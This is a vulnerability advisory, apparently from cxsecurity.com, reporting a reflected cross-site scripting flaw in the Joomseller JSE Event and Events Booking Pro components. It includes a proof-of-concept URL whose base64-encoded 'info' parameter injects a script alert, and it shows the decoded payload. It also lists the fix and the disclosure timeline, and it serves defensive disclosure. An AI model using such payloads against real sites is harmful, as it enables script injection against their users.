Joomseller Events Booking Pro / JSE Event Cross Site Scripting

2013.08.06
Risk: Low
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-79

---------------------------------------------------------------------------------------------- Joomseller "Events Booking Pro" and "JSE Event" reflected XSS ---------------------------------------------------------------------------------------------- [+] Software Link: http://www.joomseller.com/joomla-components/jse-event.html [+] Affected Versions: Component com_events_booking_v5 Component com_jse_event < 1.0.1 [+] Vulnerability Description: The vulnerable files are the following: .- For JSE Event: /modules/mod_jse_mini_calendar/tmpl/tootip.php .-For Events Booking pro: /modules/mod_eb_v5_mini_calendar/tmpl/tootip.php The "info" parameter is not correctly sanitized before being used, allowing an attacker to perform XSS attacks. As a proof of concept, an attacker could perform the following request: http://example.com/modules/mod_eb_v5_mini_calendar/tmpl/tootip.php?info=eyJldmVudHMiOiIoMTU6MDA6MDApIDxzY3JpcHQ%2BYWxlcnQoMSk7PC9zY3JpcHQ%2BIiwgImV2ZW50X2lkIjoiNjQiLCAiaXRlbWlkIjoiMSIsICJldnJfaWQiOiIxMTkxIn0%3D where the contents of the info parameter is the following payload encoded using base64 encoding {"events":"(15:00:00) <script>alert(1);</script>", "event_id":"64", "itemid":"1", "evr_id":"1191"} [+] Solution: Upgrade to JSE Event version 1.0.1. [+] Report Timeline: [30/07/2013] - Vulnerability reported to the vendor [30/07/2013] - Developer confirm vulnerability and update released [05/08/2013] - Public disclosure [+] Credits: Vulnerability discovered by Gaston Traberg.

References:

http://www.joomseller.com/joomla-components/jse-event.html


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2022, cxsecurity.com

 

Back to Top